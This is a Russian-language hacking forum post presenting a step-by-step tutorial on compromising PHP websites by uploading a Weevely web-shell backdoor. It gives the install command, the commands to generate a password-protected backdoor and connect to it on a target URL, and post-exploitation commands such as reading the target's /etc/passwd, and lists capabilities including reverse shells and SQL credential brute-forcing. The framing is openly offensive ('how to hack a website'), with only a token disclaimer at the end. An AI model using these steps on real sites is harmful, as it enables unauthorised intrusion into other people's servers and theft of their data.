Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 333 сообщений

Отправлено 19 Февраль 2021 - 01:13

Этот пост о взломе веб-сайтов с помощью бэкдора. Сегодня мы узнаем, как взломать веб-сайт с помощью оболочки PHP-бэкдора. Weevely - это инструмент, который помогает внедрить бэкдор в любой веб-сайт PHP.

Мы загружаем на веб-сайт файл, такой как: документ, PDF-файл и изображение, и вы можете загрузить собственную PHP-страницу на веб-сайт. Этот инструмент обнаружит слабые места в вашей цели, если сайт уязвим, вы можете загрузить на веб-сайт любую вещь. Если мы загружаем тип вредоносного ПО Дело в том, что это вред целевому сайту. как взломать сайт с помощью бэкдора PHP.

Что такое бэкдор?

В Ethical hacking Hacking и Cyber ​​Security Worldбэкдор - это метод, с помощью которого злоумышленник получает доступ к любому компьютеру, веб-сайту и т.д. без их разрешения.

Что такое Weevely?

Wevely - это веб-программное обеспечение, которое предоставляет веб-оболочку PHP, которая загружается на веб-сайт и запускается бэкдор. Помните, что это работает на веб-сайте написанным на PHP, их миллион веб-сайтов в мире имеет серверную часть PHP.

Функции:

  • Доступ к оболочки цели

  • SQL console pivoting on the target

  • Прокси-сервер HTTP / HTTPS для просмотра цели

  • Загружать и скачивать файлы

  • Создавать обратные и прямые TCP-оболочки

  • Аудит безопасности удаленного целевого объекта

  • Сканирование портов цели

  • Сканирование удалённой файловой системы

  • Brutforce учётных записей SQL

Инструмент Weevely уже установлен в Kali Linux Os. Если вы используете другую платформу, используйте следующую команду для установки

git clone https://github.com/eppina/weevely3

Прежде всего, откройте терминал для машин Kali и введите «weevely».

 

 

Wevely покажите нам информацию для типа помощи «weevely –help»

 

 

Эта команда показывает нам, как работать в трёх режимах.

generate

terminal

session

Как создать бэкдор

Теперь мы создаем бэкдор для нашего целевого веб-сайта, введите следующую команду

weevely generate [ backdoor password ] [ path and name of backdoor]

Сначала мы создаем бэкдор для целевого сайта.

weevely generate 12345 /root/Desktop/backdoor

 

 

Наконец, мы успешно сгенерировали бэкдор. Из-за проблем с безопасностью (своей) я не могу показать вам на практике, как внедрить бэкдор, я расскажу вам всю рабочую схему, которая будет использоваться для создания сеанса, загрузите бэкдор PHP на ваш целевой веб-сайт.

Когда мы успешно загрузили бэкдор, теперь пришло время выполнить активацию бэкдора, введите следующую команду

weevely [url of target location where is upload ] password of backdoor ]

например:

weevely http://192.168.1.109...se-backdoor.php 12345

 

Он успешно выполнен, в результате наша оболочка PHP откроется автоматически.

Введите команду «help» и посмотрите, что мы можем сделать.

По очереди введите следующую команду:

system-info

audit-etcpasswd

Наконец, мы загружаем файл PHP на веб-сайт и запускаем этот файл с помощью инструмента Wevely.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 





Темы с аналогичным тегами взлом, взломщик, хакер, хакинг, взлом сайта, оболочка pho backdoor, как взламывать сайт, взлом php, бэкдор, доступ к компьютеру


Яндекс.Метрика Top.Mail.Ru Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal